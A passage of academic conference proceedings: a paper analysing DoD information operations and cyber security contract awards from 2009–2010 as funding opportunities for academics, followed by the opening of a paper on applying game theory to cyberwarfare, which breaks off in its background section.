Information Operations (IO) Contracts across the DoD:<br />

Growth Opportunities for <strong>Academic</strong> Research – an Update<br />

Edwin Leigh Armistead 1 and Thomas Murphy 2<br />

1 Goldbelt Hawk LLC and Norwich University, USA<br />

2 NorthLight Technologies, USA<br />

larmistead@gbhawk.com<br />

earmiste@norwich.edu<br />

tmurphy@rochester.rr.com<br />

Abstract: Four years ago, the authors presented a paper at the ICIW conference in Monterey, CA (Armistead &<br />

Murphy, 2007) that outlined opportunities for academics and researchers with regard to IO (Information<br />

Operations), IW (Information Warfare) and IA (Information Assurance) contracts across the Department of<br />

Defense (DoD) and Federal government (USG). The original paper highlighted the differential between the contracts<br />
available and the opportunities current at that time. Specifically, that paper predicted what the future might hold for<br />

further growth in these areas and how growth of IO, IA and IW contract vehicles can benefit universities and<br />

academics from a funding aspect. Finally, the original paper also suggested future areas of research that<br />

academics may be interested in exploring, to best optimize their ability to secure grants and contracts over the<br />

next few years. This paper is not only an update to the original research, to review the original hypothesis and<br />

determine if the predictions from four years ago were correct, but it also mines new data sources to take a fresh<br />

look at current contracts. In this research, the authors analyze the growing new opportunities in cyber warfare,<br />

strategic communications, psychological operations and cyber security. The scope of IO / IA is also expanding<br />

further into areas of diplomacy, economics, and homeland security, while growing even more central to complex<br />

unconventional and conventional warfare applications. In addition, organizational change is accompanying these<br />

doctrinal and application area changes, which has led to a subsequent revision of the contract opportunities<br />

available. Likewise, new revisions of policy and documentation are also expected to arrive in the foreseeable<br />

future, which could lead to a deeper understanding and appreciation of cultural values and psychological roles<br />

among the multiple political players. In this review, we explore what new and promising opportunities for<br />

collaboration exist for academics, and we hope that this paper can alert researchers to alternate opportunities for<br />

funding in the IO and IA arena that they may not have considered previously.<br />

Keywords: information assurance, information operations, Department of Defense, contracts, proposals<br />

1. Introduction<br />

For many academics, funding is a constant pursuit. With the current recession, grants and<br />

other non-profit opportunities may have become more limited than in previous time periods. In this era<br />

of fiscal constraint, this paper examines another method of obtaining funds for academics that should<br />

be considered. Specifically, the authors are interested in the opportunities that lay within the realm of<br />

DoD and Federal contracting, where academics can act as consultants to the companies that are<br />

supporting these entities. In some cases, this can be quite a lucrative venture, and it offers other<br />

avenues besides grants and academic scholarships, to offset the financial needs of the tenured<br />

scholar. Therefore, this paper reviews the types of research areas that have experienced the most<br />

growth, as well as areas that will experience future growth. We identify the DoD and Federal<br />

contractors that have the best success in obtaining contracts in the IA and IO areas. We give<br />

extensive details of the global and United States Government (USG) environment, which drive the<br />

security business as well. The authors also discuss how the USG and interagency interactions<br />

influence contracting policies and awards. Understanding all of the foregoing factors and strategies will<br />

allow the academic researcher to formulate targeted business plans to employ in their search for<br />

additional funding.<br />

2. IA and IO business growth areas – players, relationships and influences<br />

The Federal IA segment is characterized by agency management that is policy, doctrine and<br />

reputation motivated.<br />

Civilian agencies' IT security directives are driven by the magnitude, not the quantity, of events.<br />

Overriding political priorities mitigate new government-wide IT security legislation. Trade-offs of<br />

efficiency and effectiveness with security-privacy differ by department.<br />


Agency Corporate Information Security Officers struggle with choosing between simply using a<br />
compliance scorecard and going further to secure their enterprise. It is easier to say you are<br />

compliant than to prove you are secure. Both are necessary to deliver cost effective solutions.<br />

Department level initiatives drive security agendas. Each USG department has separate<br />

initiatives, which in turn drive their emphasis or lack of emphasis on IA.<br />

Trends in security focus follow the path of perimeter security, then data security, and most<br />
recently coding security. This end-to-end focus on secure design, development and<br />

implementation is becoming common in all market segments.<br />

Information Systems Security Lines of Business are not expected to cannibalize short-term vendor<br />
sales.<br />

Demand for Integrated Security Services is growing. Standalone (Point) security opportunities are<br />

on the decline.<br />

Federal agencies still separate IT and physical services. Merger of IT and physical security is<br />

impeded by silos of excellence. Successful contract teams will be able to assist in integrating total<br />

security services.<br />

The Commercial IA segment of the security industry is characterized by an upper management that is<br />

litigation and profit motivated. Major trends are similar to the Federal segment. Secondly, there is a<br />

very rapid consolidation of best industry players. Cyber security firms are motivated to rapidly develop<br />

and offer full suites of integrated and managed services to meet the demand for full services. Large IT<br />

and network organizations can successfully merge with smaller IA firms if the ingenuity of the “pure-play”<br />
or point (individual security component supplier) IA firm is not lost. This is a particularly<br />

advantageous route to speed up the number and scope of offerings and to acquire experienced IA<br />

and Information Security (InfoSec) personnel who are in short supply. It is reasonable to expect<br />

similar motivation and actions in the Federal IA market for the same reasons. Thirdly, there are<br />

external factors, including a continuing rise in cybercrime, which follows the earlier increase in<br />

terrorism. Significant increases (greater than 200%) in cyber crimes occurred over the last two years.<br />

Over 100 million data records have been lost or stolen. The average cost of each data record loss is<br />

about $180/record, giving a total estimate of $18 billion lost over two years: high<br />

motivation to client and criminal alike. There is also a modest trend toward offering cyber and physical<br />

security in packages of offerings.<br />

Agencies and firms increasingly outsource more security activities each year. They determine that<br />

they can achieve cost savings or a higher level of security at the same cost and tend to increase their<br />

outsourcing budgets over time. The firms that do outsource all or part of their IT security activities will<br />

see an increase in their level of security per dollar of investment. Surprisingly, although they don’t<br />

realize it, agencies and firms that outsource Security Services are also likely to benefit from each<br />

other’s decisions to outsource. IT security outsourcing has been shown to result in a reduction in the<br />

firm's production costs and a freeing up of other resources. (Outsourcing refers to the relationship<br />

between a firm and another firm it pays to conduct security activities on its behalf). However, without<br />

careful planning and due diligence, the client's return on investment in outsourcing IT security could be<br />
reduced or become negative as a result of a variety of potential costs, including strategic risks<br />
(e.g., principal-agent problems), interoperability issues and other transaction costs.<br />

There are several emerging areas involving the “social” and risk management aspects of IA/IO.<br />

Clearly, “social” is used here to mean relationships among groups of agents, individuals or<br />

organizations that involve proprietary information. At the firm level, there is a need to assure individual<br />

firms that their partners, suppliers, or any organization they communicate with over the Internet are<br />

trustworthy to a defined level acceptable to upper management. The economic benefit of securing all<br />

members of the business group is significant. At the individual level there is growing demand to<br />

secure interpersonal communications involving proprietary information (marketing, strategy and<br />

planning, budgets or financial), email, data and image exchanges, instant messaging, etc. This is also<br />

an area of vital national interest to DoD and other Federal agencies.<br />

In addition, the global environment influencing customers as well as the Federal and Commercial IA<br />

segments is characterized by significant stress. Negative pressure from the environment that Federal<br />

and Commercial organizations must perform under has increased significantly since 2007. The United<br />

States government (USG) and the global international community, nation states, state-sponsored<br />

nongovernment organizations (NGOs), organizations, groups, and individuals have rapidly moved into<br />


a new and more unstable situation. The Diplomatic, Intelligence, Military, Economic, Cultural/Social<br />

and Environmental factors (including medical, earthquake, fire, wind and flood, etc.) [DIMES-E] are<br />

considerably more powerful. That transition from a relatively steady state into an economically harsh<br />

state is bad enough. A new, transient and poorly understood unsteady state makes prediction of<br />

expected local and global situations uncertain and thus even more stressful. Together, the DIMES-E<br />

factors above mean three things for the future:<br />

Bad actors can be expected to act even worse and previously good actors may act badly<br />

Predicting the actors’ actions and timing will be too complex and uncertain to analyze in<br />

adequate, precise and satisfactory detail<br />

Better analysis and planning for steadily moving to a more stable and less uncertain future is of<br />

paramount importance.<br />

Consistent with this global situation, a shift towards IA and Cyber security is evident in the contracts<br />

data. Defending and assuring one's data, information and knowledge is the first basic step to<br />
managing both the DIMES-E transitions and the bad actors that the social stress resulting from a rapid<br />
transition brings out.<br />

IO, IW and IA are sometimes also grouped as network and information components of “Cyber War”<br />

(Carr, 2009). Like IO and IA, Cyber War is a term that includes threats from:<br />

Cyber Attacks,<br />

Cyber Crime,<br />

Cyber Espionage,<br />

Informatized War,<br />

Information War, and<br />

Computer Network Operations<br />

Defending against these threats can potentially save billions of dollars to the USG, business and<br />

international organizations and thus serve to greatly reduce the stresses forcing the three dire<br />

expectations above. The bad actors involved are State, State-sponsored, and Non-State actors who<br />

use the Internet to attack and disrupt both military and civilian organizations. These actors commit<br />

acts of espionage against Department of Defense and DoD contractor networks. This accelerates<br />

other nation states’ race to achieve parity or near-parity with superior U.S. military technology. They<br />

commit acts of network intrusion into U.S. critical infrastructure, remaining dormant until needed to<br />

delay or stop an imminent U.S. military action against an adversary state. They further commit<br />

espionage against U.S. corporations stealing millions in intellectual property. They also disrupt<br />

national economies and rob banks on an unprecedented scale.<br />

3. Analysis of IO, IW, IA and cyber contracts<br />

As part of this research, the authors conducted a series of searches on a commercial Federal and<br />

DoD business database known as INPUT (INPUT, 2010), http://www.input.com. This tool is useful in<br />

that it stores all opportunities – past, present and future in archival form and one can search in both a<br />

functional (using multiple keywords) manner as well as an organizational one (across the federal<br />

government). In total, for this paper, searches for types of contracts were made using 13 keywords. A<br />

general search on all keywords and separate searches on each individual keyword were run.<br />

Keywords included:<br />

Information Operations (IO)<br />

Information Warfare (IW)<br />

Information Assurance (IA)<br />

Perception Management<br />

Strategic Communications<br />

Psychological Operations (PSYOPS)<br />

Public Diplomacy<br />

Electronic Warfare (EW)<br />



Deception<br />

Operations Security (OPSEC)<br />

Cyber Security<br />

Cyber Operations<br />

Cyber Warfare<br />


In addition, five different contract status categories were reviewed to include the following:<br />

Forecast Pre-RFP (Forecast Pre-Request for Proposal)<br />

Pre-RFP<br />

Post-RFP<br />

Source Selection<br />

Award (contract awarded)<br />

The data was pulled twice, 12 months apart – first in September 2009 and then again in<br />

September 2010, as shown in Tables 1 and 2. These numbers represent the contracts in the INPUT<br />

database either in process (in one of the pre-award states) or already awarded as of the date given in<br />

the table heading.<br />

Table 1: Status of all contracts by contract category as of September 2009<br />
September 2009 | Forecast | Pre-RFP | Post-RFP | Source Selection | Award | Total<br />
Information Operations | 58 | 35 | 11 | 15 | 216 | 335<br />
Information Warfare | 15 | 16 | 3 | 7 | 100 | 141<br />
Information Assurance | 79 | 143 | 22 | 45 | 399 | 688<br />
Perception Management | | | | | 2 | 2<br />
Strategic Communications | 15 | 19 | 1 | 2 | 48 | 85<br />
Psychological Operations | 6 | 2 | 3 | 3 | 37 | 51<br />
Public Diplomacy | 2 | 1 | | | 12 | 15<br />
Electronic Warfare | 52 | 58 | 22 | 39 | 333 | 504<br />
Deception | 5 | 7 | 6 | 7 | 46 | 71<br />
Operations Security | 12 | 4 | 2 | 10 | 48 | 76<br />
Cyber Security | 10 | 13 | 1 | 1 | 43 | 68<br />
Cyber Operations | | 2 | 2 | | 5 | 9<br />
Cyber Warfare | | | 2 | 1 | 2 | 5<br />
Total | 254 | 300 | 75 | 130 | 1291 | 2050<br />

Table 2: Status of all contracts by contract type as of September 2010<br />
September 2010 | Forecast | Pre-RFP | Post-RFP | Source Selection | Award | Total<br />
Information Operations | 16 | 15 | 3 | 6 | 76 | 116<br />
Information Warfare | 4 | 5 | 1 | 5 | 41 | 56<br />
Information Assurance | 46 | 70 | 7 | 30 | 290 | 443<br />
Perception Management | | | | | 1 | 1<br />
Strategic Communications | 15 | 10 | 1 | 5 | 61 | 92<br />
Psychological Operations | 8 | 4 | 2 | 3 | 41 | 58<br />
Public Diplomacy | 3 | | | | 13 | 16<br />
Electronic Warfare | 13 | 12 | 8 | 9 | 138 | 180<br />
Deception | 5 | 7 | 5 | 6 | 56 | 79<br />
Operations Security | 8 | 13 | 4 | 6 | 62 | 93<br />
Cyber Security | 11 | 15 | 3 | 4 | 53 | 86<br />
Cyber Operations | 1 | | 1 | | 11 | 13<br />
Cyber Warfare | 1 | | 3 | 3 | 5 | 12<br />
Total | 131 | 151 | 38 | 77 | 848 | 1245<br />


From the 2010 set of data, we sorted by company name and counted the number of contracts in the<br />

award state (awarded) to each company. Table 3 shows that only 29 out of 341 companies won more<br />

than two awards, and only eight companies won more than 10 awards out of the data reviewed in this<br />

research.<br />

Table 3: Frequency of the number of contracts awarded as of September 2010<br />

Awards 1 2 3 4 5 6 8 ≥ 10<br />

# of Companies 242 49 7 7 4 2 1 8<br />

Success of the awardees could be measured in several ways: total number of contracts awarded, total<br />
dollar value of contracts awarded, award dollars per employee, etc. We use a simple measure important<br />

to academic researchers, the total number of contracts, since it is a straightforward measure of their<br />

best sources of opportunities. Using the data on awarded contracts from the INPUT database we<br />

found that the eight corporations that won 10 or greater IO contracts in Table 3 included the following:<br />

Northrop Grumman Corporation 41<br />

Science Applications International Corporation (SAIC) 40<br />

General Dynamics Corporation 20<br />

BAE Systems PLC 19<br />

Lockheed Martin Corporation 19<br />

Booz Allen Hamilton 15<br />

CACI International Inc 15<br />

L-3 Communications Inc 10<br />

This information shows that as IA and IO have matured in the Federal and DoD marketplace, the<br />

competition appears to be centering more and more on the same key players. Knowing the players<br />

who have won the most contracts suggests strategies for entering the fray.<br />

4. Strategies for entering the fray<br />

The academic researcher must deliver at least best-practice and, more importantly, unique or world-class<br />
theories, models, products or services to the contract team in order to be successful. This<br />

applies to individual contributions as well as for the products and services they are developing. After<br />

satisfying these basic requirements for success, there are several key strategies for entering the fray<br />

and selecting what aspect of IO, IW or Cyber to work on. Key strategies laid out in our previous paper<br />

in 2007, centered on the following strategies:<br />

Allying Oneself with the Leading Contenders<br />

Developing a Front Runner<br />

Striking out on your Own<br />

In light of the updated contract information and current international situation, in the authors’ opinion,<br />

the new key strategies are as follows:<br />

Develop strong relationships with key individuals of those corporations that are consistently<br />

winning IO and IW contracts<br />

Focus on IO/IW areas that have the most contracts (IA and Cyber Security)<br />

Stay aligned with growing areas of interest in the community (e.g. Strategic Communications)<br />

4.1 Developing strong relationships<br />

The eight companies listed earlier have won about 25% of the total IO and IW contracts from our<br />

research data, and there is a good reason for that. IO and IW, like any endeavor, require a certain<br />

amount of expertise in the form of personnel, capabilities and past performance. Government<br />

contracting officers and their technical representatives are, in general, conservative and will often go<br />

with the “tried and true” company that has performed these duties in the past. A good example is<br />

Northrop Grumman, which ran the IO Center of Excellence for the Army at Ft Belvoir for an extended<br />
period and was recently also awarded the contract to run the IO Center for the US Marine Corps.<br />


Clearly, a strong relationship with a company which wins numerous contracts offers more<br />

opportunities for teaming on those contracts.<br />

<strong>Academic</strong>s, like the contracting company, should plan to review and update their strategies at least<br />

once a year, and must be ready to adapt to changes in the acquisition requirements (FAR), market<br />

dynamics and technological innovations. The academic can thus align their contributions to the<br />

company’s contracted requirements. The academic team member can assist the company in<br />

establishing and enhancing service offerings, building corporate values, establishing infrastructure to<br />

support corporate vision, and providing synergy by leveraging corporate resource bases.<br />

4.2 Focus on IA and cyber security<br />

Of all the areas of IO and IW, it is IA and Computer Security that hold the most promise,<br />

potential and, according to our research, the most realistic prospect of income for academic research. Every business and<br />

military organization needs protection for their computer systems. We see a serious present need to<br />

fix a significant Defensive shortfall in the US cyber position, particularly the commercial and civilian<br />

infrastructure areas. Armistead and Clarke (Armistead, 2010; Clarke & Knake, 2010) emphasize the<br />

central and crucial importance of improving Defensive Cyber capability, and of having open debate on<br />

Cyber strategy/planning/policy – similar to the process carried out for nuclear weapons when that<br />

technology emerged 50 years ago.<br />

4.3 Watch Strategic Communications<br />

Strategic Communications (SC) is an area of continuing interest in the USG, in particular to the DoS<br />

and DoD (Armistead L., 2010). SC should also be watched as a candidate for future contract growth.<br />

SC is important because it addresses a much broader, more informed view of the very demanding<br />

DIMES-E world situation the USG faces today. Because the academic community will find a number<br />

of areas in SC to which they can contribute, we include the following background details. As<br />

discussed in our previous paper (Armistead & Murphy, 2007) and by Paul (Paul, 2010), Strategic<br />

Communications refers to five areas with differing but related meanings:<br />

Enterprise level strategic communication<br />

Strategic communication planning, integration, and synchronization processes<br />

Communication strategies and themes<br />

Communication, information, and influence capabilities<br />

Knowledge of human dynamics and analysis or assessment capabilities.<br />

Paul points out that “these five specifications connect to each other logically. Within the broader<br />

strategic communication enterprise, national or campaign level goals and objectives constitute the<br />

inputs to the strategic communication planning, integration, and synchronization processes. Based on<br />

knowledge of human dynamics and analysis or assessment capabilities, these processes transform<br />

and incorporate the communication strategies and themes and provide them to commanders who<br />

employ the various available communication, information, and influence capabilities in pursuit of<br />

desired objectives. The planning, integration, and synchronization processes and knowledge,<br />

analysis, and assessment capabilities continue to be useful to force elements as they broadcast or<br />

disseminate their themes and messages or otherwise engage and appraise the impact of these<br />

activities”. The reader is referred to (Paul, 2010) for details of the following SC elements.<br />

Enterprise level strategic communication is a commonly shared but general understanding of SC;<br />

it refers to a broad range of USG enterprise level activities and their coordination for internal,<br />

national, international or global strategic goals. Enterprise level strategic communication is<br />

therefore too broad to be very meaningful.<br />

Strategic communication planning, integration, and synchronization processes are the set of<br />

processes included under the overly general USG enterprise level use of “Strategic<br />

communication”.<br />

“Communication strategies and themes are strategic communication elements that involve<br />

content and both the inputs and outputs from the strategic communication planning, integration,<br />

and synchronization processes”. This includes national or campaign goals or objectives (inputs)<br />

that planning processes will translate into communication goals and themes (outputs) and<br />

incorporate into plans. However, there is a multilevel application of these elements. The focus on<br />


these elements of strategic communication can be on levels at, above or below the USG<br />

enterprise level. They could involve higher-level international strategic goals and the implied<br />

communication. Alternatively, they could consider objectives and themes in lower level<br />

operational organizations to be coordinated with and communicated by various communication,<br />

information, and influence assets.<br />

Communication, information, and influence capabilities are broadcast, dissemination, and<br />

engagement elements of SC. Communication, information, and influence capabilities include<br />

public affairs, perception management, psychological operations (PSYOP, now MISO), defense<br />

support to public diplomacy (DoD to DoS), and civil affairs. These capabilities are thus very broad.<br />

They can be combined with elements of force, such as maneuver conducting civil-military<br />

operations or military police. They might include the interactions of any element of the USG<br />

military, diplomatic or other forces with foreign populations or the prevalence of language and<br />

cultural awareness training across the force. They might include any action or comment by every<br />

deployed diplomatic or military service member.<br />

Knowledge of human dynamics and analysis or assessment capabilities are the fundamental<br />

bases for all the preceding specified activities. In contrast to processes, knowledge, analysis and<br />

assessment are the bases of accurate models for planning effective, efficient, and successful<br />

actions. Knowledge is obtained via media monitoring, media use pattern research, target<br />

audience analysis, and social, historical, cultural, and language expertise, along with other<br />

relevant analytic and assessment capabilities. “Cultural knowledge and audience analysis are<br />

critical for translating broad strategic goals into information and influence goals. Understanding<br />

audiences specifically and human dynamics generally is critical to identifying themes, messages,<br />

and engagement approaches that will lead to desired outcomes. Data collection and assessment<br />

contribute the feedback that allows two-way communication and engagement (rather than just<br />

broadcast) and that also makes it possible to demonstrate and report impact or effect from<br />

communication activities.” (Paul, 2010)<br />

Thus, the academic researcher could contribute SC applications of Business Marketing, Psychology,<br />

Narratives, Political Science, Economics, and many other disciplines.<br />

5. Future areas of research<br />

Several assumptions must be made when determining IA/IO needs over the next five years. The first<br />

is that the U.S. economy will continue to rebound from the great recession. The second is that the<br />

U.S. will fund continuing IA efforts in the Federal budget. The third assumption is that information<br />

operations will continue to be a growth market, thus the continuing need to bolster IA needs,<br />

requirements and solutions. Continued introduction of unique discriminating Security offerings, such<br />

as an integrated set of IO services, will be vital to keeping revenue up in the contracted companies. IA<br />

services price elasticity is based on the demand from the customer base and costs for having<br />

qualified, trained and certified personnel. These personnel allow the contract team to reach critical<br />

mass in Knowledge Management, create a good reputation, and build consistent security teams to<br />

provide IA functions to customers. Given these assumptions, the customer base will remain large, and<br />

their IA needs and requirements, as well as their budgets, will continue to grow. Acquiring and<br />

maintaining personnel to support IA/IO contract teams will continue to be a challenge to employers<br />

and an opportunity for academics.<br />

How will current capabilities and technologies develop and evolve over the next five years? We can<br />

expect the introduction of a host of new technologies presenting opportunities for IT security vendors.<br />

Many of these will be wireless devices, particularly nomadic devices for home and business users.<br />

The expectation is the continued increased blending of technologies, such as is just beginning to<br />

occur in Internet and cable TV technologies. Increasingly, users of computing devices will have<br />

access to a combination of web-based technologies, including traditional HTTP/IP communications,<br />

streaming video, voice over IP (VOIP), global positioning systems and database applications. Users<br />

will be able to seamlessly move between these technologies via increasingly sophisticated user<br />

interfaces and input/output devices. The blending of technologies, along with increased use of<br />

service-oriented architecture (SOA), will increase the need for multi-level and cross-domain security<br />

capabilities. Cross-domain security requirements will increase significantly, as the ability to share data<br />

across SOAs will increase the need for securing privacy and classified data extracted from databases<br />

for use in other applications. Likewise, the DoD trend towards employing SOAs to support net centric<br />

operations will make C&A increasingly difficult. Biometric identification and access control<br />

technologies will be a growth industry, particularly in the area of identity verification technologies for<br />


use by home PC users in eCommerce. Identity theft protection needs will continue to increase, as<br />

criminals develop increasingly sophisticated means of stealing electronic identity data. The need for<br />

technologies to detect spoofing in emails and on websites will continue to grow. Finally, the capability<br />

to perform software verification and validation (V&V) to determine the inherent security of software<br />

code will become an area of increasing significance.<br />

We argued in the Strategies to Entering the Fray section, based on our analysis of current and<br />

expected contracts, that IA and Cyber Defense will receive increasing attention. Armistead and Clarke<br />

(Armistead, 2010; Clarke & Knake, 2010) also emphasize the central and crucial importance of<br />

improving Defensive Cyber capability, and of having open debate on Cyber strategy/planning/policy –<br />

similar to the process carried out for nuclear weapons when that technology emerged 50 years ago.<br />

We appreciate the need for coverage and analysis of Defensive and Offensive Cyber strategy,<br />

operations and tactics. More importantly, we also see a serious need to fix a significant Defensive<br />

shortfall in the US cyber position. Because there is no agency with responsibility for Defense of<br />

civilian banking, commercial, industrial systems, and because the DoD and the USG partially depend<br />

on the commercial internet, a monumental vulnerability exists. Engaging in conflicts with a good<br />

offense but without a good defense will fail. The nation as a whole now finds itself in that situation.<br />

These factors define additional reasons the authors switched to the Defensive current focus in our<br />

Strategies for Entering the Fray section. Both Armistead and Clarke (Armistead L., 2010; Clarke &<br />

Knake, 2010) outline a process to establish a well-founded strategy-policy-plan and minimize risk of<br />

uncontrolled Cyber-Kinetic War. These analyses suggest several topics, simulations and desktop<br />

exercises, which would be useful to USG contract work. A well-founded analysis must address our<br />

overall Strategy and Political situation, with military and cyber strategy as a component of national<br />

strategy.<br />

A difficult area needing both theoretical and practical development is formulating Measures of<br />

Performance [MOP] and Measures of Effectiveness [MOE] (Tokar, 2010). This is a focus area of military<br />

effects-based (EB) planning. Roughly, when carrying out missions involving the application of<br />

components of IO, IW, Cyber, etc., we need to measure whether we are “doing the right things” to<br />

achieve our desired goals [MOE] and whether we are “doing things right” [MOP] so as not to waste time,<br />

money, equipment and people. A related concept in the business world, which will be of increasing<br />

importance as USG and DoD budgets narrow, is Return on Security Investment [ROSI]. The difficulty<br />

with these ideas is in measuring the impact of one component alone when multiple different initiatives<br />

are brought to bear. How one separates the effects of one from the combination of all is directly<br />

related to the model of the complex DIMES-E processes being used.<br />
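As an illustration of the ROSI concept, the simple formula common in the security-economics literature can be computed directly; a minimal sketch in Python (the dollar figures below are invented for illustration and are not drawn from our contract data):

```python
def rosi(annual_loss_expectancy, mitigation_ratio, solution_cost):
    """Return on Security Investment: the fraction of the control's
    cost that is recovered (or exceeded) by the risk it removes.

    annual_loss_expectancy: expected yearly loss without the control ($)
    mitigation_ratio: fraction of that loss the control prevents (0..1)
    solution_cost: yearly cost of the control ($)
    """
    risk_reduction = annual_loss_expectancy * mitigation_ratio
    return (risk_reduction - solution_cost) / solution_cost

# Illustrative (invented) numbers: a $50,000/year control that
# prevents 80% of an expected $200,000 yearly loss.
print(rosi(200_000, 0.8, 50_000))  # -> 2.2 (a 220% return)
```

The difficulty noted above remains visible even in this toy form: the `mitigation_ratio` attributes a loss reduction to a single control, which is exactly the attribution problem when multiple initiatives act at once.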

Finally, the need for new and improved models of complex, DIMES-E systems is the most<br />

fundamental barrier to achieving success, performance and efficiency. The benefits from such<br />

insightful theory and models will be similar to the leap forward in physical sciences resulting from<br />

Newton’s or Kepler’s Laws. If we are to more simply and accurately understand, predict and act to<br />

bring about a desired future, and if we are to be able to tease out the effects of one factor (e.g. SC,<br />

MISO, etc.) from the effects of many, then we must discover and apply much more insightful theories<br />

and mathematical models to DIMES-E systems. Such models can clarify the attribution of who and<br />

what is really at work and how to anticipate and adjust to the situation. This will allow everyone,<br />

leaders and members of governments and organizations alike, to move beyond simply knowing they<br />

are in serious hardship or risk, to appreciate what is being done right and what is not, and act to bring<br />

about a more desirable future rather than an expected undesirable future.<br />

6. Summary<br />

Our overall goal has been to provide both the sources of funding opportunity for academic<br />

researchers and sufficient background to understand the strategies for acquiring funding from<br />

those sources. We first described the intuition and insight into the motivation of players, relationships<br />

and integrated influences in the IA and IO business growth areas. In particular, we noted the<br />

important influence of stress from external conditions and global DIMES-E situations. The ability to<br />

understand and address these integrated problem areas is fundamental to an academic’s funding<br />

success. Based on an analysis of contracts up to September 2010, we noted a current focus on IA<br />

and Cyber security. We concluded that IA and Cyber Security are areas that should and will continue<br />

to receive contract funding. Next, we further analyzed current and historical IO, IW, IA and Cyber<br />

contracts and identified which companies have been awarded more contracts to date and are thus<br />

“opportunity targets” for academic consulting. We provided details of strategies to enter the contract<br />


fray, suggesting that understanding the contract and the contractor, and developing strong relationships<br />

with contractors, is essential. We give substantial details on how and why one develops strong<br />

relationships. We call attention to the area of Strategic Communications as a possible future area of<br />

opportunity given the broader scope of integration and application of security contract focus. Finally,<br />

we mention several future areas of research, giving the assumptions made as well as details of<br />

selected difficult but very important technical, complex predictive modeling and MOE/MOP areas that<br />

need to be solved.<br />

References<br />

Armistead, E., & Murphy, T. (2007). The Evolution of Information Assurance and Information Operations<br />

Contracts across the DoD: Growth Opportunities for Academic Research. ICIW Conference. Monterey, CA.<br />

Armistead, L. (2010). Information Operations Matters - Best Practices. Washington, D.C.: Potomac Books, Inc.<br />

Carr, J. (2009). Inside Cyber Warfare. O'Reilly.<br />

Clarke, R. A., & Knake, R. K. (2010). Cyber War - The Next Threat to National Security and What to do About It.<br />

New York, NY: HarperCollins.<br />

INPUT. (2010). INPUT database, INPUT. Retrieved 2010, from "The Authority on Government Business"<br />

[Online]: http://www.input.com<br />

Paul, C. (2010). “Strategic Communication” Is Vague, Say What You Mean. Joint Forces Quarterly, Issue 56.<br />

Tokar, J. (2010). Assessing Operations: MOP and MOE Development. IO Journal, Vol. 2, Issue 3, 25-28.<br />



The Uses and Limits of Game Theory in Conceptualizing<br />

Cyberwarfare<br />

Merritt Baer<br />

Harvard Law School, Cambridge, USA<br />

mbaer@post.harvard.edu<br />

Abstract: In cyberwarfare, there are obstacles to reaching minimax stasis: unlike in checkers, game theory<br />

cannot follow each decision path to its conclusion and then trace the right decisions back. However, I contend<br />

that because the rational predictability of game theory will continue to drive decisions and seek out patterns in<br />

them, game theory may identify (and intelligently weight) nodes of a decision tree that are not immediately<br />

recognizable to or favored by human decision-makers. While we can’t create a network that is maximally<br />

resistant to random faults and maximally resistant to targeted faults, we can take into account the particular<br />

weaknesses and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />

risk preferences and security priorities. Moreover, using game theory to make a security strategy that is a<br />

calculated derivative of mapped potential outcomes will help us to avoid human biases and to respond to threats<br />

proportionately/economically. Rather than a process of continual growth, cyber evolution, like biological evolution,<br />

seems more aptly characterized as punctuated equilibrium—periods of relative stasis followed by quick, drastic<br />

periods of breakthrough. Reaching Nash equilibrium is unlikely in the cyberwar context because under unstable<br />

conditions, evolutionarily stable strategies don’t run a typical course. While there may be no set of moves that is a<br />

“solution” in cyberwar strategy, game theory allows human decisionmakers to intelligently identify and weight<br />

decision paths to transcend cognitive biases. This paper seeks to change the way of thinking about cyberwar--<br />

from one of stockpiling weapons, to one of looking for patterns-- thinking about the problem of cyber insecurity<br />

more holistically. The paper challenges some of the myopia in thinking about cyber in existing "warfare" terms<br />

and proposes that organic models’ tendency toward game theoretic equilibrium may help us conceive of the<br />

cyberwar decisionmaking landscape more effectively.<br />

Keywords: cyberwarfare, game theory, layered defense, Nash equilibrium<br />

1. Introduction<br />

In this paper I explore the applications and limitations of game theory to cyberwarfare at a conceptual,<br />

not case study, level. My focus is on federal strategy—especially the United States Department of<br />

Defense (DoD)—so I do not focus on addressing cybercrime or cyberattack that has as its purpose<br />

money or a local, ideological message, or even those with cyber-terrorist or cyber-anarchist goals. My<br />

focus is on large-scale acts of war aimed at military, governmental or infrastructural targets that<br />

currently only certain nation-states are likely to be able to execute, thus the other “players” in the<br />

game are nation-state-level actors.<br />

I recognize that cyberwarfare is among the rarer forms of online violence in comparison with other<br />

forms of cybercrime, but its high stakes and opportunities for more contained strategic study attracted<br />

my focus. For the purposes of this paper, I assume we have available all existing sophisticated game<br />

theoreticians, human or computerized.<br />

I find that game theory is useful to the extent that it allows us to transcend some of our system-specific<br />

biases (based on established or institutional ways of approaching problems) and threat-specific<br />

biases (rooted in evolutionarily-derived disproportionate reactions to certain threats). Game<br />

theory can allow us to weigh the nodes of the decision tree more accurately; it is not a solution as<br />

such, but a tool for holistic cyberwarfare strategy.<br />

2. Background: Nash equilibrium and complications to game-theoretical<br />

stasis in the cyber context<br />

Game theory scholars have written, though not extensively, on the application of game theory to<br />

information warfare. (See, e.g., Hamilton et al., “The Role of Game Theory in Information Warfare” and<br />

“Challenges to Applying Game Theory to Information Warfare”). The US Cyber Consequences Unit<br />

(US-CCU) claims it primarily employs an analytic method called “Value Creation Analysis” that<br />

“draws…broadly on cooperative game theory.” (See US-CCU website,<br />

http://www.usccu.us/).<br />

Two-player stochastic games may be useful in the escalation context (deciding whether to launch a<br />

preemptive attack or responding to an attack could be a two-player interaction). A study by SPIE has<br />


refined the metrics for estimating impact and intent of cyberattack, and applies Markov game theory, a<br />

stochastic approach (Shen et al. 2007). However, the two-player stochastic model is not valid<br />

when more than two players are involved, and this is the more likely scenario— as in the case of a<br />

generalized security model that would account for more than one player as a potential threat, or a<br />

model that includes potential alliances.<br />

The minimax solution in zero-sum games is Nash equilibrium (where each player is at her optimal<br />

level, taking into account the other players' strategy). There exists “at least one Nash equilibrium,<br />

possibly involving mixed strategies, for any normal-form static game with a finite number of players<br />

and strategies” (Jamakka, 2005:14). However, in cyberwarfare, there are obstacles to reaching<br />

minimax stasis: there is no assumption that it is a zero-sum game (power may exist relative to others<br />

but in cyber there can be emerging forms of power and there may be no clear endpoint that signifies<br />

“winning”); there may be more than two players; players may make simultaneous and overlapping<br />

moves (instead of taking turns like in chess); and there is no valid assumption of perfect information<br />

(one’s minimax strategy may depend on knowing the capabilities of the other players).<br />
